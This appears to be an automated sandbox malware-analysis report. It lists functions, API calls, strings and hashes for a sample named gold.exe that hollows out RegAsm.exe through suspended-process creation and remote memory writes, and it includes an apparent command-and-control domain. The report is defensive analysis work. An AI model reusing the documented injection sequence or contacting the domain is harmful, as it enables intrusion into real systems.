Function 00007FFD3448B141 Relevance: 1.8, APIs: 1, Instructions: 334
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE ref: 00007FFD3448B3C8

Memory Dump Source

Source File: 0000000F.00000002.2494128677.00007FFD34480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34480000_Traffic.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 0112b5cc10a247f63b3019048b9818251acfabf316ab2e527d18c91403a39626
Instruction ID: ef57181855e13ed65371bf1050e8d22748ef3979decef6633b3560c501b7b0fa
Opcode Fuzzy Hash: 0112b5cc10a247f63b3019048b9818251acfabf316ab2e527d18c91403a39626
Instruction Fuzzy Hash: 6EB14B70A08A8D8FDFB8EF18C895BE937E1FB59301F10413AE84EDB251DA75A944CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3448B9B1 Relevance: 1.7, APIs: 1, Instructions: 229
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNELBASE ref: 00007FFD3448BB40

Memory Dump Source

Source File: 0000000F.00000002.2494128677.00007FFD34480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34480000_Traffic.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: c46ede4a871ee75828afe230dcdab309d3a06523d4cd8a7aed6fb29122284896
Instruction ID: 2ee456ae838dde0005ecc7092d9d773a6885d519705f5c92cc13a3854c74b761
Opcode Fuzzy Hash: c46ede4a871ee75828afe230dcdab309d3a06523d4cd8a7aed6fb29122284896
Instruction Fuzzy Hash: CD711370D08A5C8FDBA8DF58C885BE9BBF1FB59310F1081AAD04DE3255CB74A9858F40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD344886A5 Relevance: 1.6, APIs: 1, Instructions: 140
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleWindow.KERNELBASE ref: 00007FFD34488770

Memory Dump Source

Source File: 0000000F.00000002.2494128677.00007FFD34480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34480000_Traffic.jbxd

Similarity

API ID: ConsoleWindow
String ID:
API String ID: 2863861424-0
Opcode ID: 84a2023faa42f643640af3ce3148663ad121e8c1a409f9dd21060d8f50d65358
Instruction ID: 6f8cb584a444e32452c04a6fbe39bdb36f642d7c6ca968ef62a357bfab17fdd9
Opcode Fuzzy Hash: 84a2023faa42f643640af3ce3148663ad121e8c1a409f9dd21060d8f50d65358
Instruction Fuzzy Hash: 96417A3090CA8C8FDB95DFA8C859BEDBBF0FF56310F1041AAD049E3252DA759885CB41

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: gold.exePID: 6508, Parent PID: 1468COMMON

Execution Graph

Execution Coverage:	39.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	44
Total number of Limit Nodes:	3

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 028124B5 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 02812624
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02812637
Wow64GetThreadContext.KERNEL32(?,00000000), ref: 02812655
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02812679
VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 028126A4
TerminateProcess.KERNELBASE(?,00000000), ref: 028126C3
WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 028126FC
WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 02812747
WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02812785
Wow64SetThreadContext.KERNEL32(?,?), ref: 028127C1
ResumeThread.KERNELBASE(?), ref: 028127D0

Strings

aryA, xrefs: 028124FB
Load, xrefs: 028124F3
ress, xrefs: 0281253F
GetP, xrefs: 02812537

Memory Dump Source

Source File: 00000011.00000002.2298508142.0000000002812000.00000040.00000800.00020000.00000000.sdmp, Offset: 02812000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2812000_gold.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
String ID: GetP$Load$aryA$ress
API String ID: 2440066154-977067982
Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction ID: 90aec03e881697997eb1692c0aa6dbbc7a66809b17c583cebf784a41944fab22
Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction Fuzzy Hash: 09B1E57660024AAFDB60CF68CC80BDA77A9FF88714F158524EA0CEB345D774FA518B94

Uniqueness

Uniqueness Score: -1.00%

Function 00B70A2F Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 474
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0, xrefs: 00B70B43

Memory Dump Source

Source File: 00000011.00000002.2296592633.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_b70000_gold.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 7f4de9758d8cc04e80ce9d9448518a23edf03c76cadee2b22d01b5eddaa0fb72
Instruction ID: ffb01acd4c7f36c904033c331235b18f11f9c1ef9db1dedaae25481bdf79e833
Opcode Fuzzy Hash: 7f4de9758d8cc04e80ce9d9448518a23edf03c76cadee2b22d01b5eddaa0fb72
Instruction Fuzzy Hash: AE12BC30910295CFCB15DFA9C480AADFFF1AF59310F59C696E4A9AB252C730F981CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00B704DF Relevance: 1.6, APIs: 1, Instructions: 69
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(03813584,?,?,?), ref: 00B70FC9

Memory Dump Source

Source File: 00000011.00000002.2296592633.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_b70000_gold.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 49254c76c4508867f48c3fc5a9932706136973c267577da9325f581051ecda65
Instruction ID: 02b5d5c1816a505d6ecc008dac55cf60732fbf5e66bd0d9e302fa1174dcd1e1e
Opcode Fuzzy Hash: 49254c76c4508867f48c3fc5a9932706136973c267577da9325f581051ecda65
Instruction Fuzzy Hash: 79212575C04259EFCB10DF99C884ADEFBF4FF48320F10816AE958A7240D3B8A954CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00B70500 Relevance: 1.6, APIs: 1, Instructions: 68
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,?,00000000,?,?), ref: 00B710B1

Memory Dump Source

Source File: 00000011.00000002.2296592633.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_b70000_gold.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 613988ed47efeb0940161336f83cec2452457bbec301f517f747d8a84ab7597d
Instruction ID: f98fc9f8251c944f953f24891bf53a01c8e190aaf1878e7233cd68e80665237b
Opcode Fuzzy Hash: 613988ed47efeb0940161336f83cec2452457bbec301f517f747d8a84ab7597d
Instruction Fuzzy Hash: FF21D3B59002499FCB10CF9DD984ADEBBF4FB48310F20846AE919A7340D3B5A954CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00B71011 Relevance: 1.6, APIs: 1, Instructions: 66
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,?,00000000,?,?), ref: 00B710B1

Memory Dump Source

Source File: 00000011.00000002.2296592633.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_b70000_gold.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: bd5b93eef68c587013cd411e68e0ff6c8549f58fb70c20513174b840152f3825
Instruction ID: 86303bce3609f5ffa13155a506302ff60c91b7904a6237c74b77b584edf7abef
Opcode Fuzzy Hash: bd5b93eef68c587013cd411e68e0ff6c8549f58fb70c20513174b840152f3825
Instruction Fuzzy Hash: 6F21F0B59002499FCB10CFA9D984ADEBBF4FF48314F20846AE859A7340C3B5A950CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B704F4 Relevance: 1.6, APIs: 1, Instructions: 60
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(03813584,?,?,?), ref: 00B70FC9

Memory Dump Source

Source File: 00000011.00000002.2296592633.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_b70000_gold.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 1202fda69db7f9d2ada36caf3e77be415e8ad0bc122a1a33f86baf27a829f227
Instruction ID: 234dfffe31367ec03a8b994f2426bf16ce916569aa993d2f902365664aa06cc1
Opcode Fuzzy Hash: 1202fda69db7f9d2ada36caf3e77be415e8ad0bc122a1a33f86baf27a829f227
Instruction Fuzzy Hash: D121D3B5D01659AFDB10DF9AC884BDEFBF4FB48310F10816AE918A7240D3B4A954CBA5

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegAsm.exePID: 1424, Parent PID: 6508COMMON

Execution Graph

Execution Coverage:	15%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	16.9%
Total number of Nodes:	332
Total number of Limit Nodes:	20

Executed Functions

Function 00421670 Relevance: 10.5, Strings: 8, Instructions: 515
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

M.C, xrefs: 00421736
l9h?, xrefs: 00421707
-Uk, xrefs: 00421772
@-t#, xrefs: 004216F2
m1w7, xrefs: 00421718
e!}', xrefs: 004216F9
}%m;, xrefs: 00421700
U=^3, xrefs: 0042170E

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: M.C$-Uk$@-t#$U=^3$e!}'$l9h?$m1w7$}%m;
API String ID: 0-2617895959
Opcode ID: 858b31ac3e56d838458b62c7e55d528acdb4f791de3a11f7d4d9e133cc0d2170
Instruction ID: 6a773ac881d51c05e7616f0b7475f283f1ec1e9526ef155ff2a7bcc4ebfbe97b
Opcode Fuzzy Hash: 858b31ac3e56d838458b62c7e55d528acdb4f791de3a11f7d4d9e133cc0d2170
Instruction Fuzzy Hash: F90259B5600B008BE328CF25D891B67B7E1FB89705F548A2DD5DA8BBA1EB74F405CB44

Uniqueness

Uniqueness Score: -1.00%

Function 004216CE Relevance: 10.5, Strings: 8, Instructions: 462
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

M.C, xrefs: 00421736
l9h?, xrefs: 00421707
-Uk, xrefs: 00421772
@-t#, xrefs: 004216F2
m1w7, xrefs: 00421718
e!}', xrefs: 004216F9
}%m;, xrefs: 00421700
U=^3, xrefs: 0042170E

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: M.C$-Uk$@-t#$U=^3$e!}'$l9h?$m1w7$}%m;
API String ID: 0-2617895959
Opcode ID: 169af5ad51359e6c2a3cafa0f7d221ece67d597ccbb47c9164488c1cbe9f2b78
Instruction ID: 87eb36321ec09d9b3df0e99b7a0e046060a02d9914ae414ceb22da4e37e7cf2a
Opcode Fuzzy Hash: 169af5ad51359e6c2a3cafa0f7d221ece67d597ccbb47c9164488c1cbe9f2b78
Instruction Fuzzy Hash: 63F137B5200B00CBE328CF25D891B67B7E1FB49705F548A6DD5DA8BAA1EB74F441CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00425183 Relevance: 8.1, APIs: 2, Strings: 2, Instructions: 1113COMMON

Download Yara Rule

Strings

cfbe, xrefs: 00425CFE
= 'Q, xrefs: 00425EF2

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: = 'Q$cfbe
API String ID: 0-911374196
Opcode ID: 6d61d4dcef794e29638592454722497267c9adfd5ffa75ec27e31235a934c28e
Instruction ID: bb3565213d9b5af794c0b6c16da6f42ae929365bcb1d7bd06dd9ed2123aaf00f
Opcode Fuzzy Hash: 6d61d4dcef794e29638592454722497267c9adfd5ffa75ec27e31235a934c28e
Instruction Fuzzy Hash: B8924970245B908EE726CB35D494BE3BBE1BF17344F84099DD4EB8B282C77AA405CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00409D20 Relevance: 6.7, Strings: 5, Instructions: 468
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

j, xrefs: 0040A02C
0, xrefs: 00409D96
tQpS, xrefs: 0040A20C
b, xrefs: 0040A166
Y!N#, xrefs: 0040A1EC

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 0$Y!N#$b$j$tQpS
API String ID: 0-1561506603
Opcode ID: add92ac52d3822ee7880eca3b58e52c51cb4fe1dc22adef4eab9e629d504a1d0
Instruction ID: 77bbfa77775ed737320afc19213c5ed02593b238c67c5d09a0c0deb4d33d9e09
Opcode Fuzzy Hash: add92ac52d3822ee7880eca3b58e52c51cb4fe1dc22adef4eab9e629d504a1d0
Instruction Fuzzy Hash: 221212B02083819BE324CF15C4A4B5BBBE2BBC6308F545D2DE4D59B392D779D8098B96

Uniqueness

Uniqueness Score: -1.00%

Function 004384D6 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

D1B7, xrefs: 0043853B
D1B7, xrefs: 00438412

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: D1B7$D1B7
API String ID: 0-2576811906
Opcode ID: 60bdf6df0d9da367abe9cafd864840737e1feb61e3c6acb89e3bd56984f3b0f9
Instruction ID: 227d40b3051d5b9f1c8533b328a387a81ecb6462684d2791c386ca89a2a782a0
Opcode Fuzzy Hash: 60bdf6df0d9da367abe9cafd864840737e1feb61e3c6acb89e3bd56984f3b0f9
Instruction Fuzzy Hash: BE516CB4518301ABD708DF10D9A172FBBE2BBCA708F04992CE48547351E7B88D05EB8A

Uniqueness

Uniqueness Score: -1.00%

Function 00415B57 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 431COMMON

Download Yara Rule

Strings

v, xrefs: 004160D9

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: v
API String ID: 0-1801730948
Opcode ID: 78c7cb8eb5fd47947f9687a8dcd3ae760c3ba7a51ab1c20e04900f3ca10b1d07
Instruction ID: c80b823732e71f4cdd7a44ad5e5a1a1d83ce3d0079143c9f8b25ab05eee7cb54
Opcode Fuzzy Hash: 78c7cb8eb5fd47947f9687a8dcd3ae760c3ba7a51ab1c20e04900f3ca10b1d07
Instruction Fuzzy Hash: 69E1DFB15083419FD324CF14C48179FBBE2AFD5308F588A6EE4998B392E739D845CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00421F80 Relevance: 2.9, Strings: 2, Instructions: 369COMMON

Download Yara Rule

Strings

A\]D, xrefs: 00422356
vSUN, xrefs: 004223BA

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: A\]D$vSUN
API String ID: 2994545307-3118794373
Opcode ID: 8d2352a8b6399613efeb3fe8ef61eea6bb1dbd676769a022aa2ea20746591ef7
Instruction ID: 035f47e295922484c15501f127bff06197c6eb06fd4f10a441f5a1a71ebf76b5
Opcode Fuzzy Hash: 8d2352a8b6399613efeb3fe8ef61eea6bb1dbd676769a022aa2ea20746591ef7
Instruction Fuzzy Hash: 58C1EEB1608361AFD710CF18D580B2BB7E1FB99318F54892EE5C497342D3B9D905CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004212B0 Relevance: 2.8, Strings: 2, Instructions: 263COMMON

Download Yara Rule

Strings

s}, xrefs: 00421580
EBC, xrefs: 00421339

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: s}$EBC
API String ID: 0-541026534
Opcode ID: 84ef991dc1042bfeecb2dd9029f31de30599de3348236ba24355e92732a81cf8
Instruction ID: d7b96847a59d0831858f5b8d16e64329f0c99a4ad7ef32cd16afe207355252a1
Opcode Fuzzy Hash: 84ef991dc1042bfeecb2dd9029f31de30599de3348236ba24355e92732a81cf8
Instruction Fuzzy Hash: AB91A5B06083518BD724CF14D89076BBBF1FF92358F548A1DE4A68B391E378D909CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00435ACB Relevance: 1.5, APIs: 1, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000000), ref: 00435B5D

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: f21a35c5c3999f510f2e72610054c5e10ecc36b1628d5fe1b25180f555448144
Instruction ID: ed305ee78db003560d5c2f81a7b8d567382a75ce1c99dc0f9374550bddc06ea8
Opcode Fuzzy Hash: f21a35c5c3999f510f2e72610054c5e10ecc36b1628d5fe1b25180f555448144
Instruction Fuzzy Hash: 0611E2705083419FE708CF10D46476BFBA1EBC5318F108A1DE8A92B681C379D90ACB86

Uniqueness

Uniqueness Score: -1.00%

Function 00435B70 Relevance: 1.5, APIs: 1, Instructions: 16libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(0043A5F6,005C003F,00000006,00120089,?,00000018,gxyz,?,0041518F), ref: 00435B9D

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8bfd55fa9a3783dde79afca9779d4b7cf76278c514d5c7b39b661a11ebe4b8a8
Instruction ID: e4f63ef377a97c2914c676668e3278340bf37c640bd7ba7daadddd8153819c93
Opcode Fuzzy Hash: 8bfd55fa9a3783dde79afca9779d4b7cf76278c514d5c7b39b661a11ebe4b8a8
Instruction Fuzzy Hash: 26E0B675509606EBDA05DF45C14051FF7E2BFC4714FA5C88DE88463204C7B4BD45DA42

Uniqueness

Uniqueness Score: -1.00%

Function 0043AE30 Relevance: 1.5, Strings: 1, Instructions: 257COMMON

Download Yara Rule

Strings

gxyz, xrefs: 0043AE98

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: gxyz
API String ID: 0-2474275795
Opcode ID: ceb255576f16f9adaadc7483df88eec2d20de2d35f8345adaf15acf30d576114
Instruction ID: e7b234e54a7d762bb6a3bd1b4f03db8f12db98f9d7bb1013814233ca64f7ddf6
Opcode Fuzzy Hash: ceb255576f16f9adaadc7483df88eec2d20de2d35f8345adaf15acf30d576114
Instruction Fuzzy Hash: F281CA72A043129BD714CF14C8A0B6BB3A1FF88364F25991EE9955B391D338EC15CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0043B800 Relevance: 1.5, Strings: 1, Instructions: 221COMMON

Download Yara Rule

Strings

gxyz, xrefs: 0043B898

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: gxyz
API String ID: 2994545307-2474275795
Opcode ID: f0177faec7a69956c04dd97d8fc761802010b033b70c12e014e70dd830497edd
Instruction ID: d5821ae3abbd5b49496d0d32a43c6cb899c31e2747818077e51798368a7f3181
Opcode Fuzzy Hash: f0177faec7a69956c04dd97d8fc761802010b033b70c12e014e70dd830497edd
Instruction Fuzzy Hash: FB81DD71608302AFD718CF14D890B2BBBA5EF89354F18991DE9958B391D338E945CBC6

Uniqueness

Uniqueness Score: -1.00%

Function 00415390 Relevance: 1.3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

Strings

789:, xrefs: 004153B8

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 789:
API String ID: 0-2924019492
Opcode ID: 10cc4ab24c7f48d7c6fa18d5fa84f84423c8fc5c7e04cbeddc6c84a1160124f3
Instruction ID: 3d07bc301c4762b4c6ee5a7646427adc52170538d6ac221be9eba05a27c8a57f
Opcode Fuzzy Hash: 10cc4ab24c7f48d7c6fa18d5fa84f84423c8fc5c7e04cbeddc6c84a1160124f3
Instruction Fuzzy Hash: AA218E78210A40CFE728CF14D8A0B67B3A2FF8A349F64492DD5C647B91E775B841CB49

Uniqueness

Uniqueness Score: -1.00%

Function 00417239 Relevance: .3, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 060579ad7ed83b5708568e21361ef92a6a948ea4e053c88b378f7500e6fe9abe
Instruction ID: 86805473c38cceb78552a0540260a6a94279074ff3da8f2079f33daa4ad5654a
Opcode Fuzzy Hash: 060579ad7ed83b5708568e21361ef92a6a948ea4e053c88b378f7500e6fe9abe
Instruction Fuzzy Hash: D1C141B0510B008BD725CF20C4A46A7BBF2FF85314F545E1DD5A74BAA1D778E54ACB88

Uniqueness

Uniqueness Score: -1.00%

Function 00414F10 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37e60dbb302552dce17ff2ecc87627b6a30742d10e5b581d4c4a92120d4de55a
Instruction ID: 57d970a1a5eaa07e00c5266ac3b256e7819b63f8173c30f7784ac52c659ae5f7
Opcode Fuzzy Hash: 37e60dbb302552dce17ff2ecc87627b6a30742d10e5b581d4c4a92120d4de55a
Instruction Fuzzy Hash: 574117B1908304DBD320AF54D8807A7B7E8EFD5314F09466AE89947381E779D885C39A

Uniqueness

Uniqueness Score: -1.00%

Function 0042A936 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61828c0bb65060645607b7bcf0ba44af168b99c9bcfbadb5323aba25d4cd7529
Instruction ID: 235f7b0fceadf091eafc56df715b5c09dc53dff0cccafe78ca5562ce20de9adc
Opcode Fuzzy Hash: 61828c0bb65060645607b7bcf0ba44af168b99c9bcfbadb5323aba25d4cd7529
Instruction Fuzzy Hash: 38F0D4B5508381CFD320DF25C94574BBBE5BBC4304F15C92EE88587291D7B9A406CF8A

Uniqueness

Uniqueness Score: -1.00%

Function 0042A245 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 83
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32 ref: 0042A384

Strings

6, xrefs: 0042A2D3
D, xrefs: 0042A293
;, xrefs: 0042A2C3
:, xrefs: 0042A283
%, xrefs: 0042A2B3
!, xrefs: 0042A2A3
3, xrefs: 0042A273

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID: AllocString
String ID: !$%$3$6$:$;$D
API String ID: 2525500382-2591950249
Opcode ID: 511d7fbf50cccccdc7858a347d8d5263d77f1ec6d27186fb6dd458a649bd9444
Instruction ID: 963f1b3e5fd6771a7d36494be66c3600f40f07d37cb3ae169d65202430aa07ab
Opcode Fuzzy Hash: 511d7fbf50cccccdc7858a347d8d5263d77f1ec6d27186fb6dd458a649bd9444
Instruction Fuzzy Hash: 5941B07010CBC18ED331CB29C89878BBBE1ABD6315F044A5DE4E98B391C779950ACB57

Uniqueness

Uniqueness Score: -1.00%

Function 0040D5D0 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 399
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32 ref: 0040D824
ExitProcess.KERNEL32 ref: 0040D830
ExitProcess.KERNEL32 ref: 0040D83F
ExitProcess.KERNEL32 ref: 0040D851

Strings

economicscreateojsu.shop, xrefs: 0040DB3D
8C, xrefs: 0040D67B

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID: ExitProcess
String ID: 8C$economicscreateojsu.shop
API String ID: 621844428-368804650
Opcode ID: 4e885f4b103528a34ba8b05d68ad07885692d717e93b6dc83f6bf867971cc171
Instruction ID: e062613535a096f7c986de94b394a9a3299ac3684046ad9440d4ee051fa42249
Opcode Fuzzy Hash: 4e885f4b103528a34ba8b05d68ad07885692d717e93b6dc83f6bf867971cc171
Instruction Fuzzy Hash: F1220760508BC1CED726CF388498702BFA16B56224F1887DDD8E94F7E7C3799406CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0041E695 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 157
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 0041E7D0
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 0041E7FE

Strings

^t, xrefs: 0041E6E3
y~, xrefs: 0041E6EA
FC, xrefs: 0041E6F1

Memory Dump Source

Source File: 00000015.00000002.2512424897.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: FC$^t$y~
API String ID: 237503144-1521909807
Opcode ID: a8e7b3d959ba0c2e9939a9772f8b6d3204565fbd883ee14c83470c6397ef026a
Instruction ID: dc40ee493d17d98de78ad753fbd4e82c648e1b0ce4107d9b48fe1586e3a3aa43
Opcode Fuzzy Hash: a8e7b3d959ba0c2e9939a9772f8b6d3204565fbd883ee14c83470c6397ef026a
